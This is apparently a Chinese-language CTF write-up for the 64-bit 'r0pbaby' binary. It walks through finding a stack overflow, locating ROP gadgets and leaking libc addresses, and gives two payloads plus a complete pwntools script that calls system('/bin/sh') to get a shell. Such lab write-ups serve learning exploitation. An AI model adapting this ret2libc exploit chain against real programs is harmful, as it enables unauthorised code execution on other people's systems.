经典的rop利用题目
作为一枚菜鸡,希望能从基础开始多学点东西
首先file命令查看文件类型为64位程序
image.png
用checksec查看开启的保护,可以看到,开启了堆栈不可执行、地址分布随机化
image.png
执行程序,有以下这些选项
image.png
选项1给出libc的地址
选项2给出libc其中一个函数的地址
选项3可以向栈中输入小于1024的任意数据
首先测试溢出点
通过peda自带的pattern_create和pattern_offset进行溢出填充位数判断
image.png
image.png
image.png
可以得到溢出填充位为8字节,之后紧接着就是ret的地址,可以进行覆盖
在这里一般思路就是覆盖为system或者其他可以执行系统命令的函数地址,使得可以getshell
需要注意的是,64位系统中通过寄存器传参,函数传参顺序是RDI,RSI,RDX,RCX,R8,R9
调用system等函数时需要先给RDI寄存器赋值参数内容'/bin/sh'
使得最后执行system('/bin/sh'),因此需要构造栈布局
这里有两种ROP的利用方法
image.png
0x01
首先是考虑先赋值RDI内容为'/bin/sh',之后再调用system函数
因此在这里需要找到gaget
image.png
这样我们的payload如下所示:
payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
ret到pop rid ; ret的地址进行执行,将栈中sh_addr('/bin/sh'的地址)传到RDI寄存器,接着ret到system_addr(sysem函数的地址)执行shell
0x02
还可以通过找到先pop寄存器,然后直接call寄存器的gaget来利用
image.png
这样的利用栈布局就如下payload所示
payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)
ret到pop rax ; pop rdi ; call rax,将栈中system_addr传到RAX寄存器,将sh_addr传到RDI寄存器,之后直接CALL RAX来执行shell
payload和栈布局找好了,接下来就是写脚本利用了
还需要得到system在libc中的地址和'/bin/sh'字符串的地址
而'/bin/sh'在libc中已经存在了,可以通过Winhex查找,也可以通过IDA查找,这里注意,找到的是offset address
image.png
image.png
在IDA中按shift+f12,再通过ctrl+f搜索也可以找到
image.png
system的内存加载地址可以通过程序的选项2直接获取,再通过system在libc中固定的偏移地址,就可以得到libc的实际加载地址,并且能够获得其他所有函数和'/bin/sh'的实际加载地址。可以使用pwntools工具来获取offset address
from pwn import *
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
system_offset = libc.symbols['system']
p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")
system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
拿到system的实际地址和偏移地址offset addr之后,就可以拿到'/bin/sh'的实际地址
sh_addr = system_addr + sh_offset - system_offset
最后system和'/bin/sh'的地址都拿到,两种payload都可以生效
image.png
image.png
from pwn import *
p = process("./r0pbaby")
elf = ELF("r0pbaby")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
system_offset = libc.symbols['system']
sh_offset = 0x179ef5
bss_addr = elf.bss()
pop_rdi_ret_offset = 0x00000000000208ef
ppc_addr_offset = 0x00000000000f53eb
p.recvuntil(": ")
p.sendline("1")
libc_addr = p.recvline().split(": ")[1].strip("\n")
libc_addr = long(libc_addr,16)
print "libc_addr:%x" % libc_addr
p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")
system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
sh_addr = system_addr + sh_offset - system_offset
pop_rdi_ret = system_addr + pop_rdi_ret_offset - system_offset
ppc_addr = system_addr + ppc_addr_offset - system_offset
print "system_addr:%x" % system_addr
print "base_addr:%x" % (system_addr - system_offset)
p.recvuntil(": ")
p.sendline("3")
p.recvuntil(": ")
#payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)
payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
length = str(len(payload))
print length
print payload
p.sendline(length)
p.sendline(payload)
p.recv()
p.interactive()
ps:
一开始写脚本直接用选项1的地址做libc基地址来加上偏移,发现怎么都是错的
选项1给出的地址不是libc的基地址,需要用选项2的函数地址泄露来算出libc的基地址
网友评论